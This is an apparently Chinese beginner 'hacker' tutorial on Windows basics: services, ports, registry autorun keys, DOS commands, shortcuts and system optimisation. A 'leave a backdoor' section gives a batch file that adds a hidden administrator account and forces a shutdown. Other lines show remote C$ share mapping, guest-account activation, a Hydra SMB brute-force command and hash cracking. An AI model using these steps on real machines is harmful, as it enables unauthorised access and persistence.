Windows基础

1、系统目录、服务、端口、注册表

2、黑客常用的DOS命令及批处理文件的编写

3、黑客常用的快捷键。以及如何优化系统

4、登录密码破解、手动清除木马病毒

5、配置黑客桌面、工作环境

1、系统目录、服务、端口、注册表

系统目录:perflogs 是日志目录、windows、用户目录、程序安装目录（Program Files or Program Files（x86） ）

Ps：某个程序想用户一登录就运行。把程序放在哪个目录下?

服务：服务是一种应用程序类型，它在后台运行。服务应用程序通常可以再本地和通过网络为用户提供一些功能，例如：客户端/服务器应用程序、WEB服务器、数据库服务器以及其他基于服务的应用程序。

打开服务：右击我的电脑打开“计算机管理”

Ctrl+r 打开运行

输入services.msc 回车打开

作用:服务决定了计算机的一些功能是否被启用

不同服务对应的功能不同

通过计算机提供的服务可以有小实现资源共享

常见服务：Web服务、Dns服务、Dhcp服务、邮件服务、Telnet服务、Ssh服务、ftp服务、Smb服务

端口：计算机“端口”是英文port的义译，可以认为是计算机与外界通讯交流的出口。按端口号可以分为3大类：公认端口也叫知名端口（Well Known Ports）；注册端口(Registered Ports)；动态和私有端口（Dynamic and/or Private Ports）；

端口作用：区分服务

端口分类：

知名端口即众所周知的端口号。范围从0到1023，这些端口号一般固定分配给一些服务。比如：21端口分配给FTP服务，25端口分配给SMTP(简单邮件传输协议)服务，80端口分配给HTTP服务，135端口分配给RPC(远程过程调用)服务等等。

动态端口:范围从1024到65535，这些端口号一般不固定分配给某个服务，也就是说许多服务都可以使用这些端口。只要运行的程序向系统提供出访问网络申请，那么系统就可以从这些端口号中分配一个供改程序使用。比如：1024端口就是分配给第一个向系统发出申请的程序。在关闭程序进程后，就会释放所占用的端口号。

不过，动态端口也常常被病毒木马程序所利用，如冰河默认连接端口号是7626、WAY2.4是8011、Netspy 3.0是7306、YAI病毒是1024等等。

常见端口：

HTTP协议代理服务器常用端口：80、8080、3128、8081、9080

FTP(文件传输)协议代理服务器常用端口：21

Telnet(远程登录)协议代理服务器常用端口：23

TFTP(Trival File Transfer Protocol)默认的端口号为69/udp

SSH(安全登录)、SCP(文件传输)、端口重定向，默认的端口号为22/tcp

SMTP Simple Mail Transfer Protocol(E-mail),默认端口号为25/tcp(木马Antigen、Email Password Sender、Haebu Coceda、Shtniltz Stealth、WinPC、WinSpy都开放这个端口)

POP3 Post Office Protocol(E-mail),默认端口号为110/tcp

Tomcat 默认端口号为8080

Win2003远程登录，默认端口为3389

Oracle 数据库 默认端口为 1521

MS SQL Server数据库色server，默认端口为1433/tcp  1433/udp

QQ 默认端口为1080/udp

黑客通过端口可以干什么：

信息收集

目标探测

服务判断

系统判断：有的服务只有wins有。有的服务只有在linux 里面有

系统角色分析

注册表：

注册表（Registry，繁体中文版windows称之为登录档）是Microsoft Windows 中的一个重要的数据库。用于存储系统和应用的设置信息，早在Windows 3.0推出OLE技术的时候，注册表就已经出现。随后推出的Windows NT 是第一个从系统级别广泛使用注册表的操作系统。但是，从Microsoft Windows 95开始。注册表才真正的成为Windows用户经常接触的内容，并在其后的操作系统中继续沿用至今。

知识掌握：

打开注册表: 在开始用输入 regedit

注册表的作用:注册表是windows操作系统中的一个核心数据库，其中存放着各种参数，直接控制着windows的启动、硬件驱动程序的装载以及一些Windows应用程序的运行，从而在整个系统中起着核心作用。这些作用包括了软、硬件的相关配置和状态信息，比如注册表中保存有应用程序和资源管理器外壳的初始条件、首选项和卸载数据等，联网计算机的整个系统的设置和各种许可，文件扩展名与应用程序关联，硬件部件的描述、状态、属性，性能记录和其他底层的系统状态信息，以及其他数据等。

A:利用注册表防病毒：不少计算机系统感染了网络病毒后，可能会在这些注册表中做修改：

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run   （开机自动运行）

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices

B:病毒经常修改的注册表键值

1. IE起始页面的修改

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main 右半部分的

(2)Internet选项按钮灰化&失效

(3)“源文件”项不可以用

(4)“运行”按钮被取消&失效

常见5个注册表：

1. HKEY_CLASS_ROOT

管理文件系统。根据在Windows中安装的应用程序的扩展名，该根键指明其文件类型的名称，相应打开改文件所需要调用的程序等等信息。

2、HKEY_CURRENT_USER

管理系统当前的用户信息。在这个根键中保存了本地计算机中存放的当前登录的用户信息，包括用户登录用户名和暂存的密码。在用户登录Windows98时，其信息从HKEY_USERS中相应的项拷贝到HKEY_CURRENT_USER中。

3、HKEY_LOCAL_MACHINE

管理当前系统硬件配置。在这个根键中保存了本地计算机硬件配置数据，此根键下的子关键字包括在SYUSTEM.DAT中，用来提供HKEY_LOCAL_MACHINE所需要的信息，或者在远程计算机中可访问的一组键中。

提权经常使用（读vac 执行密码 解密）

4、HKEY_USERS

管理系统的用户信息。在这个根键中保存了存放本地计算机口令列表中的用户标识和密码列表。同时每个用户的预配置信息都存储在HKEY_USERS根键中，HKEY_USERS是远程计算机中访问的根键之一。

1. HKEY_CURRENT_CONFIG

管理当前用户的系统配置。在这个根键中保存这定义当前用户桌面配置（如显示器等信息）的数据，该用户使用过的文档列表（MRU）,应用程序配置和其他关系当前用户的Windows 98 中文版的安装信息。

注册表的结构:

利用注册表防病毒:

入侵中常用的注册表:

1. 黑客常用的DOS命令及批处理文件的编写

黑客常用的DOS命令

Color   改变cmd颜色

Ping  -t -l 65550 ip  ： -l 指数据包大小 (ps:可以根据TTL判断操作系统是什么)    

Ipconfig  查看IP

Ipconfig /release 自动获取的IP的情况 清空IP

Ipconfig /renew  重新获取IP

Systeminfo   查看系统信息，Windows中用于显示关于计算机及其操作系统的详细配置信息，包括操作系统配置、安全信息、产品 ID 和硬件属性，如 RAM、磁盘空间和网卡和补丁信息等

ARP -a  查看所有局域网里面的IP都显示出来

Net view  查看所有局域网里面的计算机名

Shutdown -s -t 180 -c “hacked by cracer” ：-s 是关机 -r是重启  -t是时间 -c 提示

Shutdown -a 是取消任务

Dir  查看目录

Cd  切换目录

Type 或者start  seven.txt   打开seven.txt文件

Copy con c:\123.txt   :在C盘下创建一个123.txt  写完文件内容Ctrl+Z可以退出文件编辑

Md 目录名 ：创建目录

Rd 123 删除文件夹

Ren 原文件名 新文件名 重命名

Del  删除文件

Copy 复制文件

Move 移动文件

Tree 树形列出文件夹结构

Telnet

Net use k: \\192.168.80.137\c$  ：把192.168.80.137的C盘映射成本地K盘

Net use k: \\192.168.80.137\c$  /del 删除映射

Net start 查看开启了那些服务

Net start 服务名  开启服务：(如：net start telnet ,net start schedule)

Net stop 服务名  停止某服务

Net user 用户名 密码 /add ：建立用户

Net user guest /active:yes ：激活guest用户

Net user ：查看有那些用户

Net user 账户名 ：查看账户的属性

Net localGroup administrators 用户名 /add :把”用户”添加到管理员中使用管理员权限,注意：administrators 后面加s用复数

Net user guest 12345 :用guest用户登录后将密码改为12345

Net password 密码 ：更改系统登录密码

Net share :查看本地开启的共享

Net share ipc$ ：开启ipc$共享

Net share ipc$ /del：删除ipc$共享

Net share c$ /del： 删除C:共享

Netstat -a ：查看开启那些端口，常用netstat -an

Netstat -n ：查看端口的网络连接情况，常用netstat -an

Netstat -v ：查看正常运行的工作

At id号：开启已经注册的某个计划任务

At /delete ：停止所有计划任务，用参数/yes则不需要确认就直接停止

At 查看所有的计划任务

Attrib 文件名(目录名) ：查看某文件(目录)的属性

Attrib 文件名 -A  -R  -S  -H或+A  +R  +S  +H 去掉（添加）某文件的存档、只读、系统、隐藏属性；用+则是添加为某属性。

Hydra 使用方法

--hydra -l 用户名 -P 密码字段  IP地址  smb

留后门：

写批处理文件(dos下编写)

批处理文件：是都是命令组合文件，写在批处理文件的命令会别逐一制定。后缀名为.bat

C:\>copy con c:\123.bat

net user cracer 123 /add

net localgroup administrators cracer /add

shutdown -s  -t 180 -c "Hello man you are hacked by cracer"

3、黑客常用的快捷键。以及如何优化系统

Windows操作系统快捷键

F1 ：显示当前程序或者windows的帮助内容

F2 ：当你选中一个文件的话。这意味着“重命名”

F3 ：当你在桌面上的时候打开“查找：所有文件”对话框

CTRL+F4 ：关闭当前应用程序中的当前文本（如word）

F5 ：刷新

CTRL+F5 ：强行刷新

CTRL+F6 ：切还到当前应用程序中的下一个文本（加Shift可以跳到前一个窗口）

F10或ALT ：激活当前程序的菜单栏

Windows键或者CTRL+ESC ：打开开始菜单栏

CTRL+ALT+DELETE ：在win9x中打开关闭程序对话框

DELETE ：删除被选择的项目，如果是文件，将被放入回收站

SHIFT+DELETE ：删除被选择的项目，如果是文件，将直接删除而不是放入回收站

CTRL+N ：新建一个新的文件

CTRL+O ：打开“打开文件”对话框

CTRL+P ：打开“打印”对话框

CTRL+S ：保存当前操作的文件

CTRL+X ：剪贴被选择的项目到剪贴板

CTRL+INSERT 或者 CTRL+C ：复制被选择的项目到剪贴板

SHIFT+INSERT或者 CTRL+V ：粘贴剪贴板中内容

ALT+BACKSPACE 或者CTRL+Z ：撤销上一步的操作

ALT+SHIFT+BACKSPACE ：重做上一步被撤销上午操作

Windows键+M ：最小化所有被打开的窗口

Windows键+CTRL+M ：重新将恢复上一项操作前窗口的大小和位置

Windows键+E ：打开资源管理器

Windows键+F ：打开“查找”所有文件

Windows键+R ：打开“运行”对话框

Windows键+BREAK ：打开“系统属性”对话框

Windows键+CTRL+F ：打开“查找：计算机”对话框

SHIFT+F10 ：打开当前活动项目的快捷菜单

SHIFT ：放入CD的时候按下不放，可以跳过自动播放CD。在打开word的时候按下不放，可以跳过自动启动的宏。

ALT+F4 ：关闭当前应用

ALT+SPACENAR ：打开程序最上角的菜单

ALT+Tab ：切还当前程序

ALT+ESC ：切还当前程序

ALT+Enter ：将Windows下运行的MSDOS窗口在窗口的全屏状态间切还

Print+Screen ：将当前屏幕以图像方式拷贝到剪贴板

ALT+PrintScreen ：将当前活动程序窗口图像的方式拷贝的剪贴板

在IE中

ALT+Bight Arrow ：显示前一页(前进键)

ALT+Left Arrow ：显示后一页(后退键)

CTRL+Tab ：在页面上的各种框架中切还(加shift反方向)

系统优化

修改启动项：打开“运行” (Win+R)在输入msconfig

加快系统启动速度：打开msconfig找到“引导”选择（英文系统是Boot）。点击“高级选择”修改设置（处理器、内存等信息修改）。

提高窗口切还速度：有几计算机属性--性能信息和工具--调整视觉效果。先点击让Windows选择计算机的最佳设置-->再点击自定义-->把最后的勾选去掉-->确定

使用工具优化：

360安全卫士

魔方注册表清理工具

鲁大师

系统优化大师

4、登录密码破解、手动清除木马病毒

使用启动U盘破解

使用工具对hash值破解：lc5工具或者彩虹表

手动清除木马：

查询开机启动项和注册表：msconfig

查询服务

查看网络端口连接

5、配置黑客桌面、工作环境

雨滴桌面：

搭建网站：

多个IP 同一个端口创建多个网站

同一个IP 不用端口创建多个网站

不用的域名创建多个网站（DNS服务器的配置）

工具小旋风：小旋风放在网站根目录下。实现多个网站目录形式显示出来，点击后进入对应的网站页面。